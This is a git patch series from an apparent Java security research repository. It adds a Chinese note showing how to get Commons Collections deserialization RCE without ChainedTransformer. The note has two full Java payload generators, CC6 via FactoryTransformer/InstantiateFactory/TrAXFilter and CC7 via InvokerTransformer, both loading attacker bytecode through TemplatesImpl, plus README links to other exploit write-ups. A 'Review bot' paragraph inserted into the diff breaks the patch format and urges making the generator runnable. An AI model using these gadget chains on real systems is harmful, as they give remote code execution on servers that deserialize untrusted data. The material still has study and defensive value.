zo)3I4Bamj^lBW$I?5ywp7n;sJoay)f2OC6!l(Fv71p|8sGr zVwBmscu;aUJFcI-JSc!}F-DQ+1h1O@jj8AhkB43gbmjfgbbH#`!D)I!;SI0NepR{$ zaqPJ2s7nDY(Ddt!ZA0fFk61egc6BFNUt~tCaI%exKhAUMVkYB-*+GP_#61E;j&bA7 zTlXaG1Xx@ugDg_?DG!|CHQWT}?j&4(hkxr2xq-j+q=804_M8;x#=A|tJ$deY%rbr~(oAa|AGjDkZQkR3$IYAH5Zh6BSF8^kiZmR-w0DC@ig=*0;0pIX zixDjK1dhWX!Oqpw4UGjm)z5wmK+zZ3@x@r@scFJ0YGWkuKRH!`S?URH8lEe3vxhCk z0R}#0WErlATDbUVW49m`Quj}%W`c|mtkN~if{{M}z72msm}V>VT!$J8P}cb$f#M6% zB6?~zDPL7K+$xzkflC3P7{kKpQtAlTT=EeI&jK0oZUGT<9>s}-9QXnaPUt`@WdgEJ zM)^*z#*>K5478$gAd)lZoi2TZI*tHFuv^;I-Ne6Ipj%Y6+=xCRN%bn}`E?Sm!Xus&Di$AHk}J--p5;kOwn(?^4{2&~b_ 
zP74;p z@iMYj>=IGTG$IWcO^(+xFgUEFFy18oh$dym`ZI>-F9w`568|v`GRECUw2lenR1d0_ z=kJydls7f!=g%{L|N82CXhEMbIQk1{r0qkt_UqKAuQ}o)5v>!Q@+!kW)JyOCCYrVV zp8S1Ldwy#flOv4s_;r+{%BxrLOZ)vIkSvGS>xh6*eA^4fA50d%V+oj+&89l1J0g zEN|x^XU5}GPyX6o`rP54M?Upo4_V5Z%)_AX^(vT1F`#69aL-LSJcV*Izh4kradPyu zhbTz+>*7qp_UK35Nh+BqJ&OFtPuYC@sGa~l*7I@Wo&+%)B|{K=iR&M{h`tUHi7;3D zN!^0m{+WoN&tFjENOoszyfUg?PA^I-uD-%N>(*hYeLw7zZg<;KHw9jFRTX&-RE8E> zX(y$YS6Bf8N5x@K9)lu&Yh`9DUQ%OhaJ5lSd*yr&c7(0K8fuodS?{*I7>G$wtW~7hs>9ww2?mxJ08{}_l9e&2U(bdh~ zWxbxY$=R9DiL_qz z=4X#m2S$ZIJj#09puGy-2g4=;ZBFaNFk>MqlKxb{dtv#Yv?6170^?Lr9k+tZdZ1`~ zx9E)v+Wf94e4-+h&Xv>53~f_INtL1L~$*BDR`-O8@yp)4rS})`M{(Pmmrvhbw#~QLaeRO=(B3w^4qs|1ChBSz@lq|*=+VvDAjUL- z=UV1Zr*|ORfRnM7-23qGOYvGyJKh-I-cBVNzP4Rbs)bAfOnq9!y|~=fNXhpFEs6e<&FEHBPqaSz zL^#oX<680ZOnMpI5u6V-&U^XQorXaE#bpOQ!ZHoG;*9JM@+RoQYDDYn^~((c%CsXb z3=R8Yf5+OJ0z1>jMbR_1~%Wi`;4#>|^R&;T^-(597<`-3f$@YBGU1KLgjnJ=L?gckA-u zt%u$r4tz$$u0QeiYIy#G<1#ZjJj~e~eg9YZnPm*8WZ$1DGUSA_?9d@A!81wL`#%+O zI!V8hIeJ%756DepZA&vpEH!x9(5E-P{WLlZ2fnsJUdB1ZpY8N@sCuvb#%~67<=Y}i zM)Kgn->5v-zOjj=W?Z@1hw459zqI0eSrU=jsYjTZ?oVHmJJmOgtdjY58}MGLuq7ku zT*LLzS`!buZeoNx2Hp^0Gpn{76XY$?PCuyHcP80)au%XU**Y2)yxKXQwd>m8u5~S2u6pS?Nzx=lQj6 z+bEb90+%k_d#q|yK3r;rpKWEx;U9}i?T)?bpzQMe37$NUUf9byQVWYv{1-08!B(WH z7!{=pH#RVTv@4L9X%|n$) zO3~iU*PBXeVZM61qeC2;wPKU*{Zzjmlf}k{_Y2-C*!wx1b>{f(KHIBGe!nPZ3`3oc z&*pC&)p>thzj&ZFOUGwO=dZTCQfe4j96A5A2+yD9+>gdrSjV0b07VC>>C2c8?th)hJ6_{yxwi^U%>4%9j`#d`%R{4 zp>zMO>FDVYywMg0PUU}M_Y8(SF1c?V|Dhzt@%C-gg+_G%R$(hU=-YQEmVJ=W-zfBb zG{5)QUt)tDne&NN52IZA#GCmNdR!buM}iDo&Q4!u4A*8Nh@Dm=74 zt(pum)~;okYd)J4ts#Sl#{vOAg#?FA8C%hRuj!CNw%O>&4hf#^n|f$(cT*ltjv+ZB zvK~}DPkw{f=3yxzq~)Pv&7=(L)|*wS>JoDiojaq&EdFdMFm`ZA3V%b$7JI%;X0DlJ zw?E&9LOB|&>IK1Vqvli43($iq8$T?SAhw6K_Qdk-ldAKx!~Ya(d(rFPetD-|FWItu zeru8MyVnE!m07!Vh1+QE3}I#941R|66(?h;_{iU^K7j5Be|{mY zdjZI6%Qvych;M6_V4}S**!6ouZg!AhQFK7fk24r{_nv>serl#_G(3s*zuor8c#z$_ zfzHS{b$Hf8(|NS)j2tsq$24v+GkVQ4P&3u@aK_&Cm(5VQU6gAW^|YcfXM?A+oUd7U 
zGQ+le+pYpsFtWCKRBOx#IQmY&mH{h@+QSGR#)C2Z*PE0>k3T!62ev4THN2jh(wpFK zOiYmMIz$7m7k&?gSsjE=ht-y{{=;s}eKBT){l4P?O)ttSo>H zdX*lJ-F0K~tTIdLCEtJK->$xhf1%t*f}kT&(P_r-fvERz04l93Y57R|ipZs`b2X-_ zJKn$%lG7deT)QFm;ZjD3j#l9g-s*%0lfS~Ox@g*m;6|xp<>GOF_ALct_bp%gU9}xG zDpqE8SrYEeJN+haFH4oa7UA4`GbUSrOCUW@Xf6Y*^bUI8uY2&){&z97@xikK3A^!f z_bc261NulZ_hK)6K5K?~<4E|3L%ti8&&V`=r*B@QM;`2~bVxPUS#mX4h`#yS@TE57 zv~8nO4DJDka^dmZ!m;ayPYp5anymzWA)^svWU0A= zh|1A&6y&l^5N`sYKe>OO*TY#?K2@wyXZ8Ht`dHS%;rQpru{>YTuHPHC=dW*P)83kT z=ytCB`zLi#Y`WZHfI4bLs?Lw7pB|v3E)b!rQBq=T(X*F3t}kLJ4DV5 zicsd0sY7!Er$Wooqn9*n66gXIsrshP=lLJ+M4vyOZho~>c9-x;1716q@^cSw_;e-r z_UxyXZ}t9BTKZEZ~7f&HERo{tY9`vR7-)EsLb_16RUenZ)y>}To6ob%c*gl(VtGrWwnhHoY$d5`-DtAZj1(?K(MOURkQu`X2ov)+Ym zV$k5-OE4h%T{|;hkTXfH%f^G4`x2|7tJg5S&+|-xdVrn&>xP zbx=vhGj@FC9n-Y(W?9s`Det;QytwPGG24-Mc_gWAiCk~%z<=oXs`z@sF-s%*_Wc~i z{j6t?yw=KTZF@|EI!(vj%GG{u$=#aU1N4x4e}RxZ%ojDzH(yy@&m*hX5JRLCGBwCTFj5KX;E4wL3 zy0GX>+;4Sc&96WGL)K*N4wMaT!c1`~1EF)$G8HZI7dCAzt1qpE3wi}Q2jY=GR5Ug1 zr*GbA44=MLkciz*`-DfTZA~NybwAYD>06%Wxe-YRN5wrF3U1|MPY}oM5~F{-IE}*HJGSzS|0X5q z%A(O{g_g~f)>v{1K)o$^h{JR|*U;o^U!OTYoo8pvQR&T87?*mxSxLO~N;u;DPPP6L z(Mhn^Ct*>NsAvs-8?kB|7F3dn!AI4GY6MC-kd?vq#4feD7+b@~#g%49Hb*o!jNLv% z+H&BZk&0RTwbV67$wLFQg4&roADeex4|x;1a{heMc&m!ydH*~x`<=prgrZPyeS5v- ziTUR=(oapzp!a@`ij4o=2|;@-srMAOx9M)YS;Y)EMa5G{HNl57LRTFQqJs~QPO$iC zo&oU@=t~&Wp-sG;Kz5iM2YFw#*?C1Hg(NWTXqIMp7G2EcLK9}6(0MhLD z_ZbaM7L&4?DsRlVLa`@ePEyue>iKGJIQp3>?hm!#1xNO)4C%(lo!K&tji~%DOY6ie z>56R-rv6E$(v-2=?hl)zd(FF+6 zK^^FQaEaOvob{Mo9CPcxc+na2R}^FwHL$C>-z4OBxal8k-I~|fXME&kYhQTwIpT^F zwg8Hn<6If2tnzBSku8E1t3dB&J1-|Gohz+=c=drVzSqocbne9=jp~{P|9yM5IJY(= zK4wSh`8>v*W<**!l!hM)P&E>QK{Km&3|6bL&ugP6FMPtX&z(6JZ*P^Gd}sdVimr?> zqGq3-^bUwTQ4Po;0Y@2aq12 zhcxc@fBe}=4#={ej4mR&XkU5w^1`A(c0CTAD)!9OiXkYe+^dxjNO6EfUveSU*PjT? zEFB2jOVT^s^v}%xL%U8v%I(gVt(KqvT;=om?0DU;O1UyBYxmZvQ#uf+Lt?X2boL;m zt@#P>V3e6d*hk^)RCkTulxCu$-X4x;SFu*tZ(h|lSqAI1+rRdHm#;o#3u$5vH>Yj> zZ5cTAnApU9;Sql0`JHy5kna%YK(QL_Mf^5#)2I81)CD8hFZ|v=V_(+aJ!vqPMMA_? 
zf=9T36tmXIA#&d1KA!yRATdRw)kh|%LYa2-zIUlTb>g{X9;A{ktkGx<8;FH?w4nj> z;}j+S8yRGt6HdDpX$C}|I&|gP+Pk^DZHL#IIE#;XkJk6SBMBBnvmY-sq4SA3<|pX^ zc>{TBOnRHqJh4$MzKcx{Xcsf0>gRyrzkY*yRfZw5{K%NQi!rP#2O0XC@PTuhYtjRl zA}FFCvsNmjh$@9A1>WI5XNVy;QC_F~!A*(P0!t+=LIs9`PxG(^<5h^v;)|#>j{c>9 zF(!PX5R6|t6UejUk*HhoU2>zGOip>a>{~7H*kj(V;N zf6N7nWKh;3YjCZ@w81(4gRha(~IOb)PTkMr^cH4E;Y7j0hrZ-2m~#lu(pDz<~LeV{hc?9TDy z>t9vzW>dyW`~E#CUx=Q{WvaTCOcZn;A#DT24MR9@#a;ZiQNfmM==q7c9Ia;Rb&oHQ#l>EOW%4 zoPL{cZGTiWarYd)U`NhfPe2y#8OJxIC-3Jv>2^EF#wV{Jky5KRqcoNYCB}sJs}(XZ z?reP0V#7yww}ypx+yT-P#?DzK<4Oq9?Txjw0*=RskKXiz`r&-Pxbej~9~6@VWQMD* zo}T@+3svsF_H*!Si2h)h(fHnJ`;J{xzM<{k?D8&shG)E#@Bfgd^5Y)|TrZ_7%EV$9 zES?2=fKVLvSFD{kVTo0rzoxMM)_Qhl@ZFAdTUYHIa6*XKKvXGSreISY-e*G8pGqPjPp~2pxK~`@b z^b5x?kZa^){zI+%J*@WY$EVNa-o1+%Mo_W=x=vo-FTEu@NRSabML`%OwEIzn-OTZ* zwL*!aedesHXe~qUUi@Ac`Hn!}hnwU0{bdof|XjNlt0)ID24b*r|p0$ea&sKOgM zZu1#EM3UGFC0Y7zT0NkNT=2%5)Wu|st-*kaEPibnNcBkYHBwg(T>>%;zU_m}rxGe? zXP_SLGw>xc(}%a{8w)T@HvB2SjxU_fq!Yj@`8ZSzl?* z{Zt3~TuMs)z%2*M537eOp}l2I=_RiY-{sbqsvkrCYZ>WEU~+je`?;;@KzIxO?Ew!} zkO}FR?gY;Doiy(J3R>SD2=!}y+yByZyajv^edLQO?g*zu6lR^#!I-*3_CHI!{+m}{ z0{w9K(VJTRJf>s!i97Erf~oYlmDBwBdf}JXdjluZzmVLczL8}qA)q#+(yMWzj5tV>xD)nWG+=60H3YAa6fBMI<4Opw_N(ltXSp46(vU!)KS5IR;{*myr7 z2kR~~;mblNhIzNnLsRtZW%M&m?Uzz#Ja!0B*&B^dM*w{GWG^VK#caFs&K;V{PyKUp z`+oi22-%*@*GtSiwz2XZ4G8~}@6_LQ*u$hq?Ts&GBqh6WV~;rR*l&yJqK>F?Rx(E+ z%xlEJ&y(~v1x<73=0nR-B0A&2QCCw&z;poj#+tk+a5z6J0nF*R4E@=D=t)VWmdhYA z!``!Vw~5CNqY(R>>1y{+zDQ)a8oDQhdJmd#_us==#0j7 z$>TAL*b_2iMV2lr9^Dg(#6~?K{M>+lB+ct#hv$osWXCnpDP^nvLmmOUnIVNZjX~lW z;x;Sz=Cy>0h^tqEbdbphBCE{}HY08bUk&wV{0JmAnP!WqTHB5wpSn3?R{s%N2xWA0 z;UNQ6rX3P#)v!%2?tnwWi*i9Z_rp#@3iTU<^Sa6w*}fZD9;H-F6KyXg3n(#;)wGQV zau>wnKC}*;f8Ahyi%cSCY_bq#y0idzv;^X{)r7tY@!JUUrv}~loKaw#W=50teMq^G z!`<`mpstcP+f8Qsz%*dcZ0tt6V7o!zXWpyP9=lmmS`*0dKH7{1 zC7m%7NHgppCs<#_{!MARc|tk=^5+vv3%3t93}N8bg=dv^OdG9loR!>@Qyp8l+J~(% z`D8pAWp2@a|ZSNj=@maeVi7 zRuJQe!NA?(Qd4o9t##`s#d46~&bc3XM78pV)ure81%4D0Yhd=VTxn@l^f%v5f{D8g 
zEXjF2FH??AQwWkdZg1|`zh5e+vj`^9aXfBB9`24AkYLPTH-wfa z^0-84H{iu+{sqdLotr$Cr9}GSVs-Q}xMh7nM>krPFDuG#d&8W~8*kg~y!?iQ66ZSD zVpdFan!@!nEb6BlUIneT$W<1cF5;)5F5EtW-qcU}X~8*j2CM-DZ>-S(?$40_#r5xT z-EgY$_kP+s->ONI2z4(mTnw(&2gYy2O~^rb>M`ydvE`+)RlPJ zctzz$9>uJ7ZTeUl0R{e}ZFAD1y4xUj3m1vBQPbv+ydsYN=Tjg3%{#vIW%ECNq!`vj zo!i|bdcw`ic%OcD0ZL}HI#4d}NViyBqb6ACC*}NWC z5w^4r@o#CYxAty7hS@{*W?|~1Zmci|^pU?+@&>3VY!N<9`c(xt26^S=is-qPYR-g_ zS(ksXv#8q$b&GO6YDq>I`N{oXWWbUt7XJA3tNjy?Oafzuk55=W{NP+%>rQ@5sqN9u z;*T2`Jb1hdLUc^wuP&Uf@J!G@Ivml*8~E-Wf9u(CBO{HZW}B?&0h?6iKlZ1zf5Q@< zUV5t)`3hKVh8nZwVk~uX|Lz}VJyn-U3`z9;nRfihOR&&_v0F#N;^96ih=f=M13r(f zbb^?+ek9a$X!o+U+Wd~vMKn)->T6p>*8@M%xBUZ45HxhCN($lO!ng3D+e6P_3qw8ZD>8cEVoYPtWw%(p4+iIZ0wrZC@E&q}o zvo+d~w`8#V;R!jFYd_*Ph^sEJ&~P5smC8!-39(!yxp?F$|AOs@$v)V0(aq+ZNlYR1<_tOJ~jmuSxhZ?RihKcj@GP42;NqxF3#Wx#H^K3c1mO}F%)Z{u&*VWNR z^D7SDE@!#{Y9aSUrVk&ceYvY~(jxFI_wLh_pfPUCG2}tW8STC9d{dOcH!;R?MtSc! zzmdwR@|%X_quw`8pWWJEoA7M7#GfWDI*^DQ&pdm7(OIl*&VksF+k2pLWo5u--G2{` z!JbCw=e>MS9EIw;6)z0SkbBW+r;3M1JT4P>?zSpxbD-rlD;$N0I%J=4sRVlTl*Qp> zeS4tJimJ9^)cEjLP+Y&zi3T`C@Bc2pYcWRH2zn-3qV$z}zz3d6QryS7!m|i#XEIz( zY!r396(_B#^a2-$_G(x(ftr9w4du0M-K5(ptk*9GSj%P9IlUr&E>D6Ave`pP?|a&@ zL^2p`4VwT^62lFi80#&sDE2DkHt}2K@c8rWFTs6zn&sCx;;p}!ab^OY%V#&GE#D@} zpyqN~o(lDL(*KGl{ZHIaPoJks7tFGQdeaT@;{gtwZ{fm!B-)h>-?ZY$HzdU9dvAJW zFw<1Quz@p{CY#l**}+PJ?C7NjG2u-v6CauEc#p1B8;E=CrQ_0{|L@Ba3ZI^NJu}(x zeiOPma^7n=B@guJpla9F(aEieJzXglIBlExyP74O&4Kx%>mcJXiz+>U2cHsjCc_^7 zoH+w=|LO$ps806PnMkx47F4q=5fjI^i8eR?K!#`LCw9!mpR}Ma>&a7IOYP7Z=!y!V z$rUSP?z62kKT?POkw8vp&l?YPe7ae)<>i^t9_b>QtSe4c7&kCmyOz+P)A{~HPh9!R ziw*(6>7>P2N9^mDbkY7pxCOv#*S%5U3k zyn3pm+!l1Jxh%G~->Jc$R{dHx|E8Gs}lLR}`W=&@i97XuKd=BZ~dwn0C@1kNohbmeDL>P>g?lyerFAq!Sx6sI21iU4mIO+NO<`;l3#!&3cD=HnFFHE8o@@x%Ocs#c7M(_}Z^?+0x z>h2Vkz{`v@ppTtZ@y2qHgGm|PI=wo9Z8hTGxa)BTc6#^y_v}L)@W|1+h=i>$rKJMh zFA4?H4n+Qgs0Pld{rJh9Nr{7`KAZO{QTAvZV&U8!S?A?G?hA*3{!??Fzw^Lk{YBA< zEDt8a)}Sv{NN0v;7rp0j@X618g=)g8_vtmQZM0*Jzm;n zG!|OM#iU~<`^)dYI;6^{kaBQX+b@>I$x*HLh9?i!eujP~mOnrcs?(FOW&{Bt=>EeU 
zG`jq0PO+DCXY)vq_R=(8cb0E=Oihg0Qiicjv)=c|G?}cA6~IWUA(r}N^uUaX3_s!9BsxC4T7Abf0yCif1j+V z*kloZR9)e;?jRPpSa1Bi2uDNk=Fm379#5}xz1*m^e#JEZkMH4xrnq{8h?_L>B1^M0 ze@&=d@+JwzEQkZjhtl`u#}|veSscV?U9=akiCQwG>Rl|OKg)3T)vjO(plAW-zCqLz zFL_T@ob6<7TQPz*d(PlhQ_t^zs494wS*mmE4DH^1kXf%aRVUx>X8sj?v_gdW!(9=d8*GAQ30})$^jZM0-`6|{px_+E+hX(Bg%RhJvX!gx9X@B)TcG{+6q8EJ za+-Rv)tRn*R?Un{9h(d+5*`>NVpt}Jbipc|u8QVeCktYS!apY<==?%xF^P{2@^WDV zVjI)$Ks`);KAWAMwtYCSB!dTbP?OoM7r@Mo1U?8dWsYu8#OqCajrGDdx>aUR*92 z4FDM3JAU<>gTB3?6@~XVm(zsZX~-ap=TD_D%0&mEz;M*H+Gz15G30w=DfPk|0~(5- zha@#4U228tal~4+GEE==8Y_`%D@EJ-@!r+?I-xAWY*Y5~dWSus_iReWAI_Cb6;p!u2! zhpLZ-d$Brnsgb_UdQb?oN~n^d&Equ;T^hVU_k}xPIbr3!vxjRh1~k@M{GSVRvI}LE ufo)Fmh(~{v8*$Y{SCsK8M@AHL>z|k}P7z=D-BaLt>u}DYzCWM*;(q~AM1@ZP literal 0 HcmV?d00001 diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" new file mode 100644 index 0000000..3738e2d --- /dev/null +++ "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" 
@@ -0,0 +1,94 @@ +# 不用ChainedTransformer如何实现cc反序列化rce +今天有个朋友问了我这个问题,这里简单回答个这个问题 +虽然网上现在的CC链子都有这个但是我们仔细理解就能绕过了 +找一个Transformer,不受transform调用时输入的影响 +这里随便举个例子使用org.apache.commons.collections.functors.FactoryTransformer +![](./img/1.png) +这里调用了`this.iFactory.create()`,查看Factory的实现类有一个`org.apache.commons.collections.functors.InstantiateFactory` +这个类在调用create的时候可以帮助我们实例化任意类 +```java +public Object create() { + if (this.iConstructor == null) { + this.findConstructor(); + } + + try { + return this.iConstructor.newInstance(this.iArgs); + } catch (InstantiationException var2) { + throw new FunctorException("InstantiateFactory: InstantiationException", var2); + } catch (IllegalAccessException var3) { + throw new FunctorException("InstantiateFactory: Constructor must be public", var3); + } catch (InvocationTargetException var4) { + throw new FunctorException("InstantiateFactory: Constructor threw an exception", var4); + } + } +``` +还记得CC3么,使用TrAXFilter触发TemplatesImpl的例子(当然实际攻防环境下还可以使用其他类),不过我们这里还是case by case +这里我随便用一个CC做改造,就以CC6为例吧 +```java +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.collections.functors.*; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; + +import javax.xml.transform.Templates; +import java.io.*; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + + +public class CommonsCollections6Y4 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + public byte[] getPayload() throws Exception { + + + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{ + 
ClassPool.getDefault().get(evily4.class.getName()).toBytecode() + }); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + InstantiateFactory instantiateFactory = new InstantiateFactory(String.class); + FactoryTransformer factoryTransformer = new FactoryTransformer(instantiateFactory); + + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, factoryTransformer); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "y4"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + outerMap.remove("y4"); + + setFieldValue(instantiateFactory,"iClassToInstantiate",TrAXFilter.class); + setFieldValue(instantiateFactory,"iParamTypes",new Class[]{Templates.class}); + setFieldValue(instantiateFactory,"iArgs",new Object[]{obj}); + + + + + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + + return barr.toByteArray(); + } + + public static void main(String[] args) throws Exception{ + + } +} + +``` From 3ec5cce180a9a85cd4a5dd9d6f66342ff9e6ec29 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 11:53:00 +0800 Subject: [PATCH 19/72] Update README.md Add CommonCollectionsWithoutChainedTransformer --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 1b3e845..35c3c76 100644 --- a/README.md +++ b/README.md 
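Review bot: in the new CommonCollectionsWithoutChainedTransformer/index.md (@@ -0,0 +1,94 @@), the `CommonsCollections6Y4` sample leaves `main` empty and never calls the instance method `getPayload()`, and `evily4` is referenced but not defined anywhere in the file, so the listing is not self-contained and does nothing when run as committed. Either say where `evily4` comes from and have `main` call `getPayload()`, or drop `main`. The write-up would also benefit from stating its takeaway for defenders: the path shown goes through `FactoryTransformer`, `InstantiateFactory` and `TrAXFilter`, so a deserialization filter that only looks for `ChainedTransformer` does not cover it.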
@@ -58,6 +58,7 @@ - [CommonsCollections6-HashMap笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections6-HashMap/CommonsCollections6-HashMap.md) - [CommonsCollections6-Shiro1.2.4笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections6-Shiro1.2.4/CommonsCollections6-Shiro1.2.4.md) - [CommonsCollections7笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections7/CommonsCollections7.md) +- [CommonCollectionsWithoutChainedTransformer](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/CommonCollectionsWithoutChainedTransformer/index.md) - [使用TemplatesImpl改造CommonsCollections2](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/%E4%BD%BF%E7%94%A8TemplatesImpl%E6%94%B9%E9%80%A0CommonsCollections2/%E4%BD%BF%E7%94%A8TemplatesImpl%E6%94%B9%E9%80%A0CommonsCollections2.md) - [网上看到的套娃CommonsCollections11](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections11/CommonsCollections11.md) - [CommonsBeanutils1笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsBeanutils1/CommonsBeanutils1%E7%AC%94%E8%AE%B0.md) From a5ddbc1785346f7b6a960ee1a1d8e9e9567e6319 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 13:26:11 +0800 Subject: [PATCH 20/72] Update README.md Add Spring-Kafka-POC-CVE-2023-34040 --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 35c3c76..12dd21c 100644 --- a/README.md +++ b/README.md 
@@ -369,6 +369,8 @@ - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) - [Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)](https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316) +- Spring + - [Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) From f8ee767aef8e73ea8698891e9a4aea24473824c3 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 22:42:54 +0800 Subject: [PATCH 21/72] Update index.md --- .../index.md" | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" index 3738e2d..5a06827 100644 --- "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" +++ "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" 
@@ -91,4 +91,80 @@ public class CommonsCollections6Y4 { } } +``` + +或者配合cc7的变体,这样transform的参数就可以是我们任意控制的了,具体为什么就不讲了,建议复习cc7 +```java + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.Base64; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; + +public class CC7 { + public static void setFieldValue(Object obj,String fieldName,Object value) throws Exception { + Field field=obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj,value); + } + public static void main(String[] args) throws Exception { + ClassPool classPool=ClassPool.getDefault(); + CtClass ctClass = classPool.get(evil.EvilTemplatesImpl.class.getName()); + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ctClass.toBytecode()}); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + Constructor constructor = Class.forName("org.apache.commons.collections.functors.InvokerTransformer").getDeclaredConstructor(String.class); + constructor.setAccessible(true); + InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer"); + + Map hashMap1 = new HashMap(); + Map hashMap2 = new HashMap(); + Map lazyMap1 = LazyMap.decorate(hashMap1, transformer); + lazyMap1.put("0", "yy"); + Map lazyMap2 = LazyMap.decorate(hashMap2, transformer); + lazyMap2.put("yy", templates); + + Hashtable hashtable = 
new Hashtable(); + hashtable.put(lazyMap1, 1); + hashtable.put(lazyMap2, 1); + + Field table = Class.forName("java.util.HashMap").getDeclaredField("table"); + table.setAccessible(true); + Object[] array = (Object[])table.get(hashMap1); + Object node = array[0]; + if(node == null){ + node = array[1]; + } + Field key = node.getClass().getDeclaredField("key"); + key.setAccessible(true); + key.set(node, templates); + + + ByteArrayOutputStream baos=new ByteArrayOutputStream(); + ObjectOutputStream oos= new ObjectOutputStream(baos); + oos.writeObject(hashtable); + System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray()))); + + ByteArrayInputStream bais=new ByteArrayInputStream(baos.toByteArray()); + ObjectInputStream ois=new ObjectInputStream(bais); + ois.readObject(); + } +} + + ``` From 6adc81039c1b6a0eab1021e974fca680e8fdb49f Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 18 Sep 2023 09:55:59 +0800 Subject: [PATCH 22/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 使用JdkDynamicAopProxy让Jackson的触发更稳定 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 12dd21c..d107acd 100644 --- a/README.md +++ b/README.md @@ -94,6 +94,7 @@ - [Jackson原生反序列化Gadgets(实用)](https://xz.aliyun.com/t/12485#toc-5) - [Jackson构造过程会触发利用导致中断可通过重写类解决(附上demo学习)](https://github.com/Y4tacker/JavaSec/blob/main/3.FastJson%E4%B8%93%E5%8C%BA/Jackson%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Gadget/Jackson.txt(%E6%94%B9zip%E5%90%8E%E7%BC%80%E8%A7%A3%E5%8E%8B).txt) + - [从JSON1链中学习处理JACKSON链的不稳定性(使用JdkDynamicAopProxy让触发更稳定)](https://xz.aliyun.com/t/12846#toc-4) - Fastjson From f427ddce312f858ad1bed792417baa674f1c3422 Mon Sep 17 00:00:00 2001 
